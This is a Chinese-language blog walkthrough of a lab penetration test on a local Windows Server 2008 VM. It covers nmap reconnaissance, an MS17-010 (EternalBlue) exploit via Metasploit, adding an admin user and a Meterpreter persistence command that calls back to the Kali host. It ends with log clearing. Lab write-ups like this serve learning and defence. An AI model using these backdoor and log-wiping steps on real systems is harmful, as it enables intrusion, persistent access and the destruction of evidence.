記一次本地Windows-2008滲透測試
一、概述
本次滲透測試是在已知Windows server 2008中存在某些漏洞的情況下,進行的驗證性測試,目的在於熟悉滲透測試流程,掌握滲透測試工具的基本使用方法。
首先明確我們的滲透測試目標:Windows server 2008(192.168.6.135),
其次明確我們的滲透測試步驟:
- 資訊收集
- 漏洞嗅探
- 漏洞利用
- 提權與維權
- 痕跡清理
- 滲透測試總結
最後是明確需要使用到的工具:nmap,MSF,Kali(192.168.6.128).
梳理好這些思路之後,便可以開始我們的滲透測試。
二、資訊收集
對主機的資訊收集全程使用nmap進行,作為一款強大的資訊收集工具,nmap具備了主機探測、埠掃描、服務版本掃描、主機系統指紋識別、漏洞探測等功能。
本次資訊收集主要有以下步驟:
1、主機探測
通過對目標主機所在子網進行批量探測,發現目標主機處於活躍狀態,並開放了21、80、445、3389等埠。
探測語法:nmap 192.168.6.0/24
2、系統指紋識別
探測語法:nmap -O 192.168.6.135
3、服務指紋識別
對主機進行服務指紋資訊探測,收集相關服務資訊。
探測語法:nmap -sV 192.168.6.135
4、常見漏洞探測
由於該主機開放了445、3389等埠,通過探測445埠,發現該主機存在ms17-010(永恆之藍)、ms12-020(遠端桌面協議RDP拒絕訪問)等高危漏洞。
探測語法:nmap --script=vuln 192.168.6.135
1)445埠下的永恆之藍漏洞:
2)3389埠下的拒絕訪問漏洞
三、漏洞利用、提權與維權
漏洞利用、提權與維權,我們需要用到的是MSF這一個滲透測試工具,藉助其強大與全面的攻擊模組來進行攻擊,對於我們做驗證性測試的初學者來說,簡單易上手。在此次測試中僅以MS17-010(永恆之藍)漏洞進行驗證測試。
1、MS17-010漏洞利用
1)在MSF中搜尋可利用的攻擊模組(search ms17-010)
2)選用相應的攻擊模組進行攻擊,並設定相關引數進行攻擊。在這裡由於目標系統是win 2008,所以使用第二個通用攻擊模組。
3)攻擊成功,獲得meterpreter後滲透模組。
2、提權與維權
進入shell,檢視當前使用者許可權已經為system許可權,為方便後面測試,在管理員使用者組新增新使用者。
使用persistence建立一個永續性的後門。
語法: run persistence -S -U -X -i 5 -p 4444 -r 192.168.6.128
詳細資訊如下:
-S:在啟動時自動啟動代理作為服務,具有系統許可權。
-U:在使用者登入時自啟動代理
-X:在系統啟動時自啟動代理
-i:每次嘗試連線之間的時間間隔(單位為 s)
-p:執行metasploit的使用者監聽的埠
-r:執行監聽程式metasploit使用者的IP
在MSF 中設定監聽程式,執行後發現對應的後門已經建立:
3、痕跡清除
在meterpreter中使用run event_manager -i
命令可檢視日誌資訊,通過 run event_manager -c
或 clearv
命令清除對登入日誌。
相關文章
- 記一次授權滲透測試
- 記一次難忘的滲透測試
- 記一次奇妙的某個edu滲透測試
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- 滲透測試之本地檔案包含(LFI)
- 滲透測試學習記錄
- 【原創】記一次對X呼APP的滲透測試APP
- 滲透測試會用到哪些工具?滲透測試教程
- 記學習滲透測試之列舉
- metasploit 滲透測試筆記(meterpreter篇)筆記
- 記一次log4j2引發的滲透測試
- Linux滲透測試Linux
- 什麼是滲透測試?為什麼要做滲透測試?
- 記pWnOS1.0靶機滲透測試
- 記學習滲透測試之情報收集
- metasploit 滲透測試筆記(基礎篇)筆記
- 什麼是滲透測試?滲透測試分類方式有哪些?
- 滲透測試怎麼做?滲透測試的步驟有哪些?
- 你真的瞭解“滲透測試”嗎?滲透測試有何作用?
- 什麼是滲透測試?滲透測試分為哪幾類?
- 記一次實戰滲透
- 【滲透測試】Vulnhub DarkHole
- 滲透測試報告測試報告
- 滲透測試之nmap
- 什麼是滲透測試?滲透測試的服務方式有哪些?
- 什麼是滲透測試?滲透測試培訓班如何選擇?
- 滲透測試什麼?滲透測試具體操作流程是什麼
- 網路安全滲透測試的型別!滲透測試入門教程型別
- 滲透測試的工具有哪些?記得收藏!
- 記學習滲透測試之掃描埠
- 記學習滲透測試之報告測試引數二
- 記學習滲透測試之報告測試引數一
- 記學習滲透測試之報告測試引數四
- 記學習滲透測試之報告測試引數三
- 什麼是滲透測試?網站有必要進行滲透測試嗎?網站
- 滲透測試是什麼?滲透測試三種分類主要包括哪些?
- 【滲透測試】Vulnhub Hackable II
- Web 端滲透測試初探Web